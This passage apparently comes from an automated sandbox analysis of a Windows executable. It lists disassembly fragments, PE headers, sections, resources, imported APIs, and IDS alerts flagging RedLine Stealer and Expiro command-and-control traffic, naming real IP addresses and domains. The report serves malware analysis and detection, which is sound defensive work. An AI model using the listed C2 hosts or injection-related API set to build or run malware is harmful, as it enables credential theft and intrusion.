                                                                                                                                                                                                                                                                                                          jmp dword ptr [00416428h+ecx*4]
                                                                                                                                                                                                                                                                                                          nop
                                                                                                                                                                                                                                                                                                          mov eax, E4004163h
                                                                                                                                                                                                                                                                                                          arpl word ptr [ecx+00h], ax
                                                                                                                                                                                                                                                                                                          or byte ptr [ecx+eax*2+00h], ah
                                                                                                                                                                                                                                                                                                          and edx, ecx
                                                                                                                                                                                                                                                                                                          mov al, byte ptr [esi]
                                                                                                                                                                                                                                                                                                          mov byte ptr [edi], al
                                                                                                                                                                                                                                                                                                          mov al, byte ptr [esi+01h]
                                                                                                                                                                                                                                                                                                          mov byte ptr [edi+01h], al
                                                                                                                                                                                                                                                                                                          mov al, byte ptr [esi+02h]
                                                                                                                                                                                                                                                                                                          shr ecx, 02h
                                                                                                                                                                                                                                                                                                          mov byte ptr [edi+02h], al
                                                                                                                                                                                                                                                                                                          add esi, 03h
                                                                                                                                                                                                                                                                                                          add edi, 03h
                                                                                                                                                                                                                                                                                                          cmp ecx, 08h
                                                                                                                                                                                                                                                                                                          jc 00007F28C06D5B2Eh

                                                                                                                                                                                                                                                                                                          Rich Headers

                                                                                                                                                                                                                                                                                                          Programming Language:
                                                                                                                                                                                                                                                                                                          • [ASM] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                          • [C++] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                          • [ C ] VS2005 build 50727
                                                                                                                                                                                                                                                                                                          • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                                                                          • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                                                                          • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                                                                          • [LNK] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x5d528.rsrc
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                          .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                          .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                          .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                          .rsrc0xab0000x5d5280x5d600e3b77aaf1a8e36a7b68570c4bf63ab97False0.026967243975903613data3.232973918989002IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                          RT_ICON0xab5380x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                                                                                                                                                                                          RT_ICON0xab6600x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                                                                                                                                                                                          RT_ICON0xab7880x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                                                                                                                                                          RT_ICON0xab8b00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/mEnglishGreat Britain0.010526082196644672
                                                                                                                                                                                                                                                                                                          RT_ICON0xed8d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishGreat Britain0.3820921985815603
                                                                                                                                                                                                                                                                                                          RT_ICON0xedd400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishGreat Britain0.06628630705394191
                                                                                                                                                                                                                                                                                                          RT_ICON0xf02e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishGreat Britain0.1294559099437148
                                                                                                                                                                                                                                                                                                          RT_ICON0xf13900x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishGreat Britain0.01858807523955992
                                                                                                                                                                                                                                                                                                          RT_ICON0x101bb80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishGreat Britain0.042512990080302314
                                                                                                                                                                                                                                                                                                          RT_MENU0x105de00x50dataEnglishGreat Britain0.9
                                                                                                                                                                                                                                                                                                          RT_DIALOG0x105e300xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                                                                                                                                                                                                          RT_STRING0x105f300x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                                                                                                                                                                                                          RT_STRING0x1064600x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                                                                                                                                                                                                          RT_STRING0x106af00x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                                                                                                                                                                                                          RT_STRING0x106f300x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                                                                                                                                                                                                          RT_STRING0x1075300x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                                                                                                                                                                                                          RT_STRING0x107b900x388dataEnglishGreat Britain0.377212389380531
                                                                                                                                                                                                                                                                                                          RT_STRING0x107f180x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x1080700x5adataEnglishGreat Britain0.7666666666666667
                                                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x1080d00x14dataEnglishGreat Britain1.15
                                                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x1080e80x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                          RT_GROUP_ICON0x1081000x14dataEnglishGreat Britain1.25
                                                                                                                                                                                                                                                                                                          RT_VERSION0x1081180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                                                                                                                                                                                                          RT_MANIFEST0x1082b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                                                                          WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                                                                                                                                                                                                          VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                                                                                                                                                                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                                                                                                                                                                                                          COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                                                                                                                                                                                                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                                                                                                                                                                                                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                                                                                                                                                                                                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                                                                                                                                                                                                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                                                                                                                                                                                                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
                                                                                                                                                                                                                                                                                                          USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
                                                                                                                                                                                                                                                                                                          GDI32.dllDeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
                                                                                                                                                                                                                                                                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                                                                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
                                                                                                                                                                                                                                                                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                                                                                                                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
                                                                                                                                                                                                                                                                                                          OLEAUT32.dllSafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

                                                                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                                          EnglishGreat Britain
                                                                                                                                                                                                                                                                                                          EnglishUnited States

                                                                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:26.609785+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.54970718.141.10.10780TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:27.497755+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:27.497755+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:28.296964+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.549711TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:28.296964+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.549711TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:28.326326+02002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5632991.1.1.153UDP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:28.978523+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1212.162.149.532049192.168.2.549706TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:29.068154+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.549713TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:29.068154+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.549713TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:29.544972+02002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5639071.1.1.153UDP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:30.046321+02002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.5649431.1.1.153UDP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:31.577907+02002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.5547451.1.1.153UDP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:33.148215+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.549724TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:33.148215+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.549724TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:34.043970+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:34.589789+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:34.594611+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1212.162.149.532049192.168.2.549706TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:35.130041+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:35.981709+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:36.844179+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:37.969534+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:40.570303+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:42.974911+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:46.311317+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:46.636681+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:46.811614+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:47.045742+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:48.178596+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:48.606672+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:48.611756+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:50.217086+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:51.539038+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:52.850906+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:55.012884+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:07:57.473457+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:00.032542+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:03.371412+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:05.405349+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549706212.162.149.532049TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:06.325846+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.549929TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:06.325846+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.549929TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:07.906644+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.549942TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:07.906644+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.549942TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:13.663685+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.549985TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:13.663685+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.549985TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:14.476076+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.549992TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:14.476076+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.549992TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:22.918743+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.550017TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:22.918743+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.550017TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:28.098339+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.55002234.211.97.4580TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:28.103171+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.550022TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:28.103171+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.550022TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:46.579278+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.550040TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:46.579278+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.550040TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:55.636463+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.550057TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:08:55.636463+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.550057TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:09:05.122422+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.213.104.8680192.168.2.551583TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:09:05.122422+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.213.104.8680192.168.2.551583TCP
                                                                                                                                                                                                                                                                                                          2024-10-10T10:09:07.445163+02002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.5535671.1.1.153UDP

                                                                                                                                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.668926001 CEST49704443192.168.2.5104.26.12.205
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:07:23.668966055 CEST44349704104.26.12.205192.168.2.5
